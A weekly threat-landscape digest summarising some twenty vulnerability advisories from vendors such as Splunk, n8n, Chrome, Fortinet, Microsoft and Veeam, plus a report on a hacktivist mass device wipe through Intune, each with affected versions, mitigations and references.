Weekly Threat Landscape Digest – Week 11

1. High-Severity RCE Vulnerability in Splunk Enterprise (CVE-2026-20163)

A high-severity vulnerability has been identified in Splunk Enterprise and Splunk Cloud Platform that could allow attackers to execute arbitrary shell commands on affected systems. The issue exists in the /splunkd/__upload/indexing/preview REST API endpoint used when previewing uploaded files before indexing. Due to insufficient input validation, an attacker with a role containing the high-privilege capability edit_cmd could exploit the unarchive_cmd parameter to inject and execute shell commands on the Splunk server. Successful exploitation could lead to remote command execution, unauthorized access, and potential compromise of the affected Splunk environment. The vulnerability is tracked as CVE-2026-20163 with a CVSS score of 8.0 (High).

Affected Versions:
Splunk Enterprise versions below 10.2.0, 10.0.4, 9.4.9, and 9.3.10, and Splunk Cloud Platform versions below 10.2.2510.5, 10.0.2503.12, 10.1.2507.16, and 9.3.2411.124.

Mitigation:
Organizations should update Splunk Enterprise and Splunk Cloud Platform to the fixed versions released by Splunk. It is also recommended to restrict access to high-privilege capabilities such as edit_cmd, apply least-privilege access controls, and monitor Splunk logs for unusual REST API activity or command execution attempts.

Reference:
https://advisory.splunk.com/advisories/SVD-2026-0302

2. Critical Remote Code Execution Vulnerabilities in n8n (CVE-2026-27493, CVE-2026-27577)

Security researchers have identified two critical vulnerabilities affecting the workflow automation platform n8n that could allow attackers to execute arbitrary commands on affected servers and potentially compromise sensitive credentials stored within the platform.

The first vulnerability, CVE-2026-27493, is an unauthenticated zero-click remote code execution flaw in n8n Form nodes caused by a double-evaluation issue in the expression engine. When a multi-step form renders user input back to the submitter through an HTML rendering step, the input may be interpreted and evaluated twice as an expression. This allows attackers to inject malicious expressions that can execute arbitrary shell commands on the server. The vulnerability has a CVSS v4.0 score of 9.5 (Critical) and can be exploited remotely without authentication through public multi-step form endpoints.

The second vulnerability, CVE-2026-27577, is a sandbox escape flaw in the n8n expression compiler caused by a missing case in the Abstract Syntax Tree (AST) rewriter. Certain expression structures such as SpreadElement are not properly transformed, allowing attackers to bypass sandbox protections and interact directly with the underlying Node.js environment. This vulnerability has a CVSS v4.0 score of 9.4 (Critical) and can allow attackers with limited privileges to execute system-level commands on affected servers.

Patched Versions:
n8n versions 2.10.1, 2.9.3, and 1.123.22 or later.

Mitigation:
Organizations using n8n should upgrade immediately to the patched versions. It is also recommended to restrict exposure of public workflow endpoints, review access controls for workflow execution, and monitor systems for suspicious expression injections or abnormal workflow activity.

References:
https://nvd.nist.gov/vuln/detail/CVE-2026-27493
https://nvd.nist.gov/vuln/detail/CVE-2026-27577

3. Google Chrome Security Update Fixes Multiple Vulnerabilities (CVE-2026-3913 and others)

Google has released security updates for Chrome version 146 addressing 29 vulnerabilities affecting Windows, macOS, and Linux platforms. The update includes one critical vulnerability and multiple high-severity flaws, many of which are related to memory handling issues such as heap buffer overflows, integer overflows, out-of-bounds reads, and use-after-free (UAF) conditions that could potentially lead to browser crashes or arbitrary code execution.

The critical vulnerability CVE-2026-3913 is a heap buffer overflow issue in the WebML component. Several high-severity vulnerabilities were also addressed, including CVE-2026-3914 (integer overflow in WebML), CVE-2026-3915 (heap buffer overflow in WebML), CVE-2026-3916 (out-of-bounds read in Web Speech), CVE-2026-3917 (use-after-free in Agents), CVE-2026-3918 (use-after-free in WebMCP), CVE-2026-3919 (use-after-free in Extensions), CVE-2026-3920 (out-of-bounds memory access in WebML), CVE-2026-3921 (use-after-free in TextEncoding), CVE-2026-3922 (use-after-free in MediaStream), CVE-2026-3923 (use-after-free in WebMIDI), and CVE-2026-3924 (use-after-free in WindowDialog).

Fixed Versions:
Chrome 146.0.7680.71 (Linux) and 146.0.7680.71 / 146.0.7680.72 (Windows and macOS).

Mitigation:
Users and organizations are advised to update Google Chrome to the latest stable version to mitigate the identified vulnerabilities and reduce the risk of exploitation.

Reference:
https://chromereleases.googleblog.com/2026/03/stable-channel-update-fordesktop_10.html

4. Multiple Vulnerabilities in HPE Aruba Networking AOS-CX (CVE-2026-23813 – CVE-2026-23817)

Multiple security vulnerabilities have been identified in HPE Aruba Networking AOS-CX software that could allow attackers to bypass authentication, execute unauthorized commands, or manipulate URLs in the web management interface. Successful exploitation could lead to unauthorized administrative access, command execution, or redirection of users to attacker-controlled websites.

The most critical vulnerability, CVE-2026-23813 (CVSS 9.8), is an authentication bypass flaw in the AOS-CX web-based management interface that could allow an unauthenticated remote attacker to bypass authentication and potentially reset the administrator password. Other vulnerabilities include CVE-2026-23814 (CVSS 8.8), a command injection flaw in an AOS-CX CLI command that may allow a low-privileged authenticated attacker to inject malicious commands, and CVE-2026-23815 and CVE-2026-23816 (CVSS 7.2) which may allow privileged users to execute unauthorized or arbitrary commands on the underlying operating system through the CLI. Additionally, CVE-2026-23817 (CVSS 6.5) is an open redirect vulnerability in the web interface that could redirect users to malicious websites.

Affected Versions:
AOS-CX 10.17.xxxx (10.17.0001 and earlier), 10.16.xxxx (10.16.1020 and earlier), 10.13.xxxx (10.13.1160 and earlier), and 10.10.xxxx (10.10.1170 and earlier). The vulnerabilities impact multiple Aruba CX switch platforms including the 10000, 4100i, 6000, 6100, 6200F, 6300, 6400, 8320, 8325, 8360, 8400, and 9300 series.

Mitigation:
Organizations are advised to upgrade to the patched versions AOS-CX 10.17.1001, 10.16.1030, 10.13.1161, and 10.10.1180 or later and restrict access to management interfaces while applying strong authentication and monitoring administrative activities.

Reference:
https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05027en_us&docLocale=en_US

5. Multiple Vulnerabilities in Cisco IOS XR and Cisco Contact Center Products

Cisco has released security updates addressing multiple vulnerabilities affecting Cisco IOS XR Software and Cisco Contact Center products. These vulnerabilities could allow attackers to cause denial-of-service (DoS) conditions, privilege escalation, or cross-site scripting (XSS) attacks in affected environments. Successful exploitation could disrupt network operations, allow unauthorized privilege escalation, or enable malicious scripts to execute within web interfaces.

One vulnerability, CVE-2026-20118 (High), affects the Cisco IOS XR Egress Packet Network Interface Aligner and could allow specially crafted traffic to trigger a denial-of-service condition on affected devices. Another flaw, CVE-2026-20074 (High), exists in the Multi-Instance IS-IS feature of Cisco IOS XR Software and may allow crafted protocol traffic to cause a DoS condition. Additionally, CVE-2026-20040 and CVE-2026-20046 (High) are CLI privilege escalation vulnerabilities that could allow a locally authenticated attacker to gain elevated privileges through the command-line interface. Two medium-severity vulnerabilities, CVE-2026-20116 and CVE-2026-20117, affect Cisco Contact Center products and could allow attackers to inject malicious scripts into web interfaces leading to cross-site scripting attacks.

Mitigation:
Organizations are advised to apply the security updates and mitigation measures provided by Cisco and monitor systems for abnormal network traffic, unauthorized CLI activities, or suspicious web interface interactions.

Reference:
https://sec.cloudapps.cisco.com/security/center/publicationListing.x

6. High-Severity Privilege Escalation Vulnerability in Ivanti Desktop and Server Management (CVE-2026-3483)

A high-severity vulnerability has been identified in Ivanti Desktop and Server Management (DSM) that could allow a locally authenticated attacker to escalate privileges on affected systems. The vulnerability, tracked as CVE-2026-3483 (CVSS 7.8 – High), is caused by an exposed dangerous method within Ivanti DSM due to CWE-749 (Exposed Dangerous Method). An attacker with local access could exploit this flaw to gain elevated privileges, potentially allowing unauthorized access, modification of sensitive data, or disruption of system operations.

Affected Versions:
Ivanti Desktop and Server Management (DSM) 2026.1 and earlier.

Mitigation:
Organizations are advised to update Ivanti DSM to version 2026.1.1 or later, apply the latest security patches, and monitor systems for suspicious privilege escalation attempts or abnormal administrative activity.

Reference:
https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-DSM-CVE-2026-3483?language=en_US

7. Microsoft March 2026 Security Updates Address Multiple Vulnerabilities

Microsoft has released its March 2026 Patch Tuesday updates addressing multiple vulnerabilities across several products and services. The update includes two publicly disclosed zero-day vulnerabilities, a critical remote code execution flaw, and several other security issues that could lead to privilege escalation, denial-of-service, remote code execution, or information disclosure in affected environments.

Two zero-day vulnerabilities were disclosed. CVE-2026-21262 is a SQL Server elevation of privilege vulnerability that could allow an authorized attacker to elevate privileges to SQLAdmin over a network due to improper access control. CVE-2026-26127 is a denial-of-service vulnerability in Microsoft .NET caused by an out-of-bounds read condition that could allow an unauthenticated attacker to disrupt services remotely.

A critical vulnerability, CVE-2026-21536, affects the Microsoft Devices Pricing Program and could allow remote code execution on affected systems, potentially leading to system compromise.

Other notable vulnerabilities include CVE-2026-26110 and CVE-2026-26113, which are remote code execution vulnerabilities in Microsoft Office that can be triggered through the Preview Pane, allowing malicious content to execute without requiring the user to open the file. Additionally, CVE-2026-26144 is an information disclosure vulnerability in Microsoft Excel that could expose sensitive information and potentially enable data exfiltration through integration with Microsoft Copilot.

Mitigation:
Organizations are advised to apply the latest Microsoft March 2026 security updates across affected systems and ensure timely patch management to reduce the risk of exploitation.

Reference:
https://msrc.microsoft.com/update-guide/releaseNote/2026-Mar

8. Multiple High-Severity Vulnerabilities in Fortinet Products (CVE-2026-24018, CVE-2025-54820, CVE-2026-24017, CVE-2026-22627)

Fortinet has disclosed multiple high-severity vulnerabilities affecting FortiManager, FortiWeb, FortiClient Linux, and FortiSwitch AXFixed products. These flaws could allow attackers to perform local privilege escalation, bypass authentication rate limits for brute-force attacks, execute unauthorized commands, or achieve code execution depending on the affected product and deployment.

The vulnerabilities include CVE-2026-24018 (CVSS 7.4), a symlink-following flaw in FortiClient Linux that may allow a local unprivileged user to escalate privileges to root; CVE-2025-54820 (CVSS 7.0), a stack-based buffer overflow in the FortiManager fgtupdates service that may allow a remote unauthenticated attacker to execute unauthorized commands if the service is enabled; CVE-2026-24017 (CVSS 7.3), an authentication rate-limit bypass vulnerability in FortiWeb that could enable brute-force attacks against admin logins through crafted requests; and CVE-2026-22627 (CVSS 7.7), a classic buffer overflow in the LLDP OUI field of FortiSwitch AXFixed that may allow an unauthenticated attacker on the adjacent network to execute unauthorized code or commands via a crafted LLDP packet.

Affected Versions:
FortiClient Linux 7.4.0 through 7.4.4 and 7.2.2 through 7.2.12; FortiManager 7.4.0 through 7.4.2, 7.2.0 through 7.2.10, and all 6.4 versions; FortiWeb 8.0.0 through 8.0.2, 7.6.0 through 7.6.5, 7.4.0 through 7.4.10, 7.2.0 through 7.2.11, and 7.0.0 through 7.0.11; and FortiSwitch AXFixed 1.0.0 through 1.0.1.

Mitigation:
Organizations should upgrade affected Fortinet products to the fixed versions or latest available releases, review exposure of vulnerable services, and monitor for suspicious login attempts, crafted network packets, or abnormal administrative activity.

References:
https://fortiguard.fortinet.com/psirt/FG-IR-26-083
https://fortiguard.fortinet.com/psirt/FG-IR-25-098
https://fortiguard.fortinet.com/psirt/FG-IR-25-082
https://fortiguard.fortinet.com/psirt/FG-IR-25-086

9. Multiple Security Vulnerabilities in Adobe Products

Adobe has released multiple security updates addressing critical and important vulnerabilities across several products including Adobe DNG SDK, Substance 3D Stager, Premiere Pro, Illustrator, Acrobat/Reader, Adobe Commerce, Adobe Commerce B2B, and Magento Open Source. These vulnerabilities could allow attackers to perform arbitrary code execution, privilege escalation, denial-of-service, or security feature bypass in affected environments.

Several vulnerabilities involve memory corruption issues such as out-of-bounds writes, buffer overflows, and use-after-free flaws, which may lead to arbitrary code execution. Notable vulnerabilities include CVE-2026-27280 (Out-of-bounds Write) and CVE-2026-27281 (Integer Overflow) in Adobe DNG SDK, multiple critical flaws in Adobe Substance 3D Stager including CVE-2026-27273 to CVE-2026-27279, CVE-2026-27269 in Adobe Premiere Pro, and several vulnerabilities in Adobe Illustrator including CVE-2026-21333, CVE-2026-21362, CVE-2026-27271, CVE-2026-27272, and CVE-2026-27267 which could allow arbitrary code execution through memory corruption.

Additional vulnerabilities were addressed in Adobe Acrobat and Acrobat Reader, including CVE-2026-27220 and CVE-2026-27278 (Use-After-Free) that may allow arbitrary code execution, and CVE-2026-27221, which could allow privilege escalation through improper verification of cryptographic signatures.

Adobe Commerce, Adobe Commerce B2B, and Magento Open Source were also affected by several vulnerabilities including stored cross-site scripting, authorization bypass, server-side request forgery (SSRF), path traversal, and security feature bypass flaws such as CVE-2026-21290, CVE-2026-21361, CVE-2026-21284, CVE-2026-21311, CVE-2026-21289, and CVE-2026-21309, which may allow attackers to escalate privileges or execute malicious actions in web environments.

Mitigation:
Organizations are advised to apply the latest security updates released by Adobe for the affected products and ensure systems are running the latest supported versions.

References:
https://helpx.adobe.com/security/products/dng-sdk/apsb26-30.html
https://helpx.adobe.com/security/products/substance3d_stager/apsb26-29.html
https://helpx.adobe.com/security/products/premiere_pro/apsb26-28.html
https://helpx.adobe.com/security/products/acrobat/apsb26-26.html
https://helpx.adobe.com/security/products/illustrator/apsb26-18.html
https://helpx.adobe.com/security/products/magento/apsb26-05.html

10. Critical Cross-Site Scripting Vulnerability in ZITADEL (CVE-2026-29191)

A critical vulnerability has been identified in ZITADEL, an open-source Identity and Access Management (IAM) platform used for authentication services such as Single Sign-On (SSO) and Multi-Factor Authentication (MFA). The vulnerability could allow attackers to execute malicious scripts through a crafted link, potentially leading to unauthorized access to user accounts.

The flaw, tracked as CVE-2026-29191 (CVSS 9.3 – Critical), exists in the Login V2 interface, specifically in the /saml-post endpoint responsible for processing SAML Identity Provider (IdP) requests. Due to improper validation of user-supplied parameters, malicious input can be reflected in the server response, resulting in a cross-site scripting (XSS) condition. Successful exploitation may allow an unauthenticated attacker to execute malicious JavaScript within a victim’s session, potentially enabling actions such as password resets, session hijacking, or account takeover.

Affected Versions:
ZITADEL 4.0.0 through 4.11.1.

Mitigation:
Organizations using ZITADEL are advised to upgrade to version 4.12.0 or later, apply the latest security patches, and monitor authentication systems for suspicious login activity or unusual SAML request behavior.

Reference:
https://nvd.nist.gov/vuln/detail/CVE-2026-29191

11. Multiple Critical Vulnerabilities in HP Device Manager

Multiple security vulnerabilities have been identified in HP Device Manager (HPDM) that could allow attackers to compromise affected systems. The vulnerabilities impact HPDM versions prior to 5.0.16 and originate from several integrated components and third-party libraries used within the platform. Successful exploitation could lead to remote code execution, privilege escalation, denial-of-service (DoS), and sensitive information disclosure.

Several critical vulnerabilities have been identified including CVE-2023-38545 (CVSS 9.8) affecting the cURL component, CVE-2025-55754 (CVSS 9.6) affecting Apache Tomcat, and CVE-2025-23048 (CVSS 9.1) affecting Apache HTTP Server. These vulnerabilities could allow attackers to exploit underlying services within HP Device Manager and gain unauthorized control over affected systems.

Affected Versions:
HP Device Manager all versions prior to 5.0.16.

Mitigation:
Organizations are advised to upgrade HP Device Manager to version 5.0.16 or later, apply security patches, and review system logs for suspicious activity or abnormal service behavior.

Reference:
https://support.hp.com/nz-en/document/ish_14442335-14442364-16/hpsbhf04092

12. Critical Vulnerability in Nginx UI (CVE-2026-27944)

A critical vulnerability has been identified in Nginx UI that could allow unauthenticated attackers to download and decrypt full system backups from affected servers. The vulnerability, tracked as CVE-2026-27944 (CVSS 9.8 – Critical), may expose sensitive data including user credentials, system configuration files, session tokens, and SSL/TLS private keys, potentially leading to full compromise of the affected server environment.

The flaw allows attackers to retrieve backup files without authentication and decrypt them, which could enable access to critical infrastructure information and administrative credentials.

Affected Versions:
Nginx UI versions prior to 2.3.2.

Mitigation:
Organizations using Nginx UI are advised to upgrade to version 2.3.3 or later, restrict access to management interfaces, and review systems for any unauthorized backup access or suspicious activity.

Reference:
https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-g9w5-qffc-6762

13. SAP Security Patch Day – March 2026 Updates

SAP has released 15 security notes as part of its March 2026 Security Patch Day, addressing vulnerabilities across multiple enterprise products including SAP NetWeaver, Supply Chain Management, Business One, Business Warehouse, and SAP GUI. The updates include 2 critical, 1 high, 11 medium, and 1 low severity vulnerabilities, with the most severe issues potentially allowing code injection, insecure deserialization, and denial-of-service attacks.

One critical vulnerability, CVE-2019-17571 (CVSS 9.8), affects SAP Quotation Management Insurance (FS-QUO 800) and involves a code injection flaw that could allow attackers to execute malicious code. Another critical vulnerability, CVE-2026-27685 (CVSS 9.1), affects SAP NetWeaver Enterprise Portal Administration (EP-RUNTIME 7.50) and is caused by insecure deserialization, which could allow attackers to compromise the system.

A high-severity vulnerability, CVE-2026-27689 (CVSS 7.7), impacts SAP Supply Chain Management, where attackers could exploit the flaw to trigger a denial-of-service condition affecting system availability.

Affected Versions:
SAP Supply Chain Management versions SCMAPO 713, 714; S4CORE 102–104; S4COREOP 105–109; and SCM 700–712.

Mitigation:
SAP recommends applying the latest security notes and patches immediately, prioritizing critical and high-severity vulnerabilities to reduce the risk of exploitation in production environments.

Reference:
https://support.sap.com/en/my-support/knowledge-base/security-notes-news/march2026.html

14. Security Bypass and Information Disclosure Vulnerabilities in Apache ZooKeeper (CVE-2026-24281, CVE-2026-24308)

Multiple vulnerabilities have been identified in Apache ZooKeeper, a widely used open-source service that provides configuration management, naming services, and synchronization for distributed applications. These vulnerabilities could allow attackers to bypass hostname verification mechanisms and expose sensitive information stored in configuration files or system logs.

The first vulnerability, CVE-2026-24281, affects the ZKTrustManager component and involves improper certificate validation, which could allow attackers to bypass hostname verification and impersonate trusted hosts during secure communications. Another vulnerability, CVE-2026-24308, affects the ZKConfig component and could expose sensitive secrets through system logs, potentially allowing attackers to retrieve credentials or other confidential information.

Affected Versions:
ZooKeeper 3.9.0 through 3.9.4 and 3.8.0 through 3.8.5.

Mitigation:
Organizations are advised to upgrade Apache ZooKeeper to the patched versions 3.9.5 or 3.8.6, apply security updates, and review system logs to ensure sensitive information is not exposed.

References:
https://nvd.nist.gov/vuln/detail/CVE-2026-24281
https://www.tenable.com/cve/CVE-2026-24308

15. Actively Exploited Privilege Escalation Vulnerability in Hikvision IP Cameras (CVE-2017-7921)

A critical vulnerability has been identified in multiple Hikvision IP camera models that could allow attackers to bypass authentication and escalate privileges on affected devices. The vulnerability, tracked as CVE-2017-7921, affects the web interface of Hikvision IP cameras and has been listed in Known Exploited Vulnerabilities (KEV) catalogs, indicating active exploitation by threat actors.

The flaw allows attackers to bypass authentication mechanisms and gain elevated privileges on vulnerable devices. Successful exploitation could allow attackers to access sensitive device information, modify configurations, or tamper with camera operations, potentially compromising surveillance infrastructure.

Affected Products:
Several Hikvision camera series including DS-2CD2xx2F-I, DS-2CD2xx0F-I, DS-2CD2xx2FWD, DS-2CD4x2xFWD, DS-2CD4xx5, DS-2DFx Series, and DS-2CD63xx Series running firmware versions between V5.0.x and V5.4.x depending on the model.

Mitigation:
Organizations are advised to upgrade affected devices to the latest firmware versions, verify firmware across all deployed cameras, avoid exposing surveillance devices directly to the internet, segment camera networks, restrict management access through VPN or secure internal networks, and enforce strong administrative password policies.

Reference:
https://www.hikvision.com/us-en/support/document-center/special-notices/privilegeescalating-vulnerability-in-certain-hikvision-ip-cameras/

16. Multiple Vulnerabilities in AWS-LC Cryptographic Library (CVE-2026-3336, CVE-2026-3337, CVE-2026-3338)

Multiple vulnerabilities have been identified in AWS-LC, an open-source cryptographic library used by various AWS services and applications for encryption and certificate validation. Successful exploitation could allow attackers to bypass certificate or signature validation mechanisms or perform timing side-channel analysis, potentially compromising cryptographic verification processes.

The vulnerabilities include CVE-2026-3336, a certificate chain validation bypass in the PKCS7_verify function that may allow attackers to bypass certificate chain verification when processing PKCS7 objects with multiple signers. Another flaw, CVE-2026-3337, involves a timing side-channel vulnerability in AES-CCM tag verification, where timing discrepancies during decryption could allow attackers to infer authentication tag validity. Additionally, CVE-2026-3338 is a signature validation bypass in PKCS7_verify, which could allow attackers to bypass signature verification when processing PKCS7 objects with authenticated attributes.

Affected Versions:
AWS-LC v1.41.0 to v1.68.x, AWS-LC-FIPS 3.0.0 to 3.1.x, aws-lc-sys v0.24.0 to v0.37.x, and aws-lc-sys-fips v0.13.0 to v0.13.11 depending on the vulnerability.

Mitigation:
Organizations using AWS-LC should upgrade to the patched versions AWS-LC v1.69.0 or later, AWS-LC-FIPS v3.2.0 or later, aws-lc-sys v0.38.0 or later, and aws-lc-sys-fips v0.13.12 or later to mitigate the identified vulnerabilities.

Reference:
https://aws.amazon.com/security/security-bulletins/rss/2026-005-aws/

17. Critical Authentication Bypass Vulnerability in pac4j-jwt (CVE-2026-29000)

A critical vulnerability has been identified in pac4j-jwt, a widely used Java authentication library for handling JSON Web Tokens (JWT). The vulnerability could allow remote attackers to bypass authentication and forge administrative credentials under certain conditions.

The flaw, tracked as CVE-2026-29000 (CVSS 10.0 – Critical), exists in the JwtAuthenticator component when processing encrypted JWT tokens (JWE). Due to improper validation logic, the library may accept an unsigned token after decryption and skip the signature verification step. This could allow attackers to craft forged JWT tokens containing arbitrary user or administrator claims, potentially leading to authentication bypass and unauthorized privilege escalation.

Affected Versions:
pac4j-jwt versions 4.x, 5.x, and 6.x.

Mitigation:
Organizations using pac4j-jwt should upgrade to the patched versions 4.5.9 or later (4.x branch), 5.7.9 or later (5.x branch), and 6.3.3 or later (6.x branch) and review authentication logs for suspicious token activity.

Reference:
https://nvd.nist.gov/vuln/detail/CVE-2026-29000

18. Critical Remote Code Execution Vulnerability in Zephyr RTOS (CVE-2026-1678)

A critical vulnerability has been identified in Zephyr RTOS, an open-source real-time operating system widely used in IoT devices, embedded systems, sensors, wearables, and industrial gateways. The vulnerability affects the DNS resolver component and could allow unauthenticated remote attackers to execute arbitrary code on affected devices.

The flaw, tracked as CVE-2026-1678 (CVSS 9.4 – Critical), exists in the dns_unpack_name() function within the DNS parsing library. Improper memory boundary handling may allow attackers to send specially crafted DNS responses that trigger an out-of-bounds memory write, leading to memory corruption and potential remote code execution (RCE) on vulnerable devices.

Affected Systems:
Devices running Zephyr RTOS with the DNS resolver functionality enabled may be impacted.

Mitigation:
Organizations using Zephyr RTOS are advised to upgrade to the latest patched version where the DNS parsing logic has been hardened and monitor embedded devices for abnormal DNS activity.

Reference:
https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-536f-h63g-hj42

19. Hacktivist Group “Handala” Conducts Large-Scale Device Wipe Using Legitimate MDM Tools

Hacktivist group Handala reportedly conducted a large-scale cyberattack against Stryker Corporation by abusing legitimate enterprise management tools rather than deploying traditional malware. The attackers allegedly compromised high-privilege Microsoft Entra (Azure AD) administrative accounts, enabling them to leverage Microsoft Intune’s Remote Wipe functionality through the Microsoft Graph API. The attack reportedly resulted in the wiping of approximately 200,000 devices including laptops, servers, and employee mobile devices, alongside claims of 50TB of data exfiltration.

The attack demonstrates a “Living-off-the-Land” (LotL) technique where legitimate administrative tools are weaponized to execute destructive actions while blending with normal administrative activity. By issuing wipe commands through trusted APIs, the activity could bypass many traditional malware-based detection mechanisms.

Key Behavioral Indicators:

• Sudden spikes in RemoteWipe or FactoryReset actions within Intune audit logs
• Unauthorized creation of Global Administrator or Intune Administrator roles
• Administrative logins from unusual geographical locations or suspicious VPN exit nodes

Mitigation:
Organizations should implement phishing-resistant MFA such as FIDO2 security keys, enforce Privileged Identity Management (PIM) with Just-In-Time administrative access, restrict administrative access through Conditional Access policies, and configure SIEM alerts for abnormal device wipe activity or mass administrative actions.

Reference:
https://www.linkedin.com/posts/rajeshyadla_cybersecurity-infosec-threatintelligence-activity-7437908483536052224-ZqAa/?utm_source=share&utm_medium=member_ios&rcm=ACoAAAEucNkBVl2AG4fWXdgMDBHe709plFrEfX8

20. Critical Remote Code Execution Vulnerabilities in Veeam Backup & Replication

Veeam has released security updates addressing multiple critical vulnerabilities in Veeam Backup & Replication (VBR) that could allow attackers to execute remote code on vulnerable backup servers. VBR is widely used enterprise backup and disaster recovery software, making it a high-value target for attackers seeking access to critical infrastructure and backup data.

Several critical vulnerabilities were identified, including CVE-2026-21666, CVE-2026-21667, and CVE-2026-21669, which allow low-privileged domain users to execute remote code on backup servers through low-complexity attacks. Another vulnerability, CVE-2026-21708, could allow a Backup Viewer account to achieve remote code execution with postgres user privileges.

In addition to these critical flaws, Veeam also patched several high-severity vulnerabilities that could allow attackers to escalate privileges on Windows-based VBR servers, extract stored SSH credentials, and bypass restrictions to manipulate files on backup repositories.

Veeam Backup & Replication servers are frequently targeted in ransomware campaigns, as compromising backup infrastructure can allow attackers to disable recovery capabilities, perform lateral movement across networks, and exfiltrate sensitive data. Threat groups such as FIN7, Cuba ransomware, and other ransomware operators have previously exploited vulnerabilities in VBR environments.

Affected Systems:
Veeam Backup & Replication installations running versions prior to 12.3.2.4465 and 13.0.1.2067.

Mitigation:
Organizations are strongly advised to upgrade Veeam Backup & Replication to versions 12.3.2.4465 or 13.0.1.2067 or later, apply all security patches, and monitor backup infrastructure for suspicious activity or unauthorized access attempts.

Reference:
https://www.bleepingcomputer.com/news/security/veeam-warns-of-critical-flaws-exposing-backup-servers-to-rce-attacks/